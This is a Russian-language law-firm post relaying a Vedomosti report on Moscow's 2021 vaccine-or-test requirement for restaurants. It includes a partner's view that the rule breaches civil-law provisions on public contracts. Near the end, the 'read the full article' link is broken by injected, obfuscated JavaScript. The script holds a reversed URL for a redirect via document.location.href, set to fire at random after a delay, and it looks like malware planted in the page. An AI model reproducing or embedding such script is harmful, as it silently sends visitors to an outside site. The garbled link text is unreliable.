Московские рестораны ждут убытков из-за новых ограничений. В плюсе останутся сервисы по доставке еды, которые готовятся к росту числа заказов

Комментарии партнёра Orchards Алексея Станкевича для газеты «Ведомости».

Согласно указу Собянина, с 28 июня попасть в рестораны в российской столице смогут люди, сделавшие прививку от коронавируса, или переболевшие им в течение полугода, или при наличии отрицательного ПЦР-теста, действительного три дня. Люди с медицинским отводом от прививки и дети в возрасте до 18 лет смогут посещать «бесковидные» рестораны при предъявлении отрицательного теста на коронавирус, уточнил руководитель департамента торговли и услуг города Москвы Алексей Немерюк в эфире телеканала «Россия 24». Вакцинированным жителям Подмосковья можно будет ходить в объекты общепита Москвы при предъявлении QR-кода с сайта госуслуг.

Решение сильно ударит по отрасли, считают опрошенные «Ведомостями» участники ресторанного рынка. Весь сегмент общепита столкнется со снижением выручки, так как доля вакцинированных действительно невелика, а оплачивать ПЦР-тест, чтобы посетить ресторан, не каждый может себе позволить, говорит управляющий партнер и генеральный директор Ginza Project Moscow Максим Ползиков. С ним согласен и директор по развитию компании – владельца бренда «Якитория» Александр Муратов, который ожидает снижения количества гостей в ресторанах. Впрочем, он надеется, что введенные ограничения будут временными.

Алексей Станкевич, партнёр Orchards, считает, что ограничения, введенные властями Москвы, объяснимы с точки зрения целесообразности и, очевидно, продиктованы правильной и благородной целью, вместе с тем градация граждан по признаку «привит/не привит» точно не находится в компетенции региональных властей. Он считает, что налицо прямое нарушение норм гражданского законодательства, положений о публичном договоре (ст. 426 ГК РФ). «Поражение в гражданских правах отдельных категорий граждан возможно исключительно федеральным законом при наличии, естественно, соответствующих оснований», – говорит Алексей Станкевич.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torani-ubitkov?fbclid=IwAR37dn6mCBWkfqsJ4yoEJOZGhILVeybz1DempbOPwb2Y1uAPp3uLTuYr6ts»>Читать статью целиком на сайте газеты «Ведомости».

Подпишитесь на Telegram Orchards

X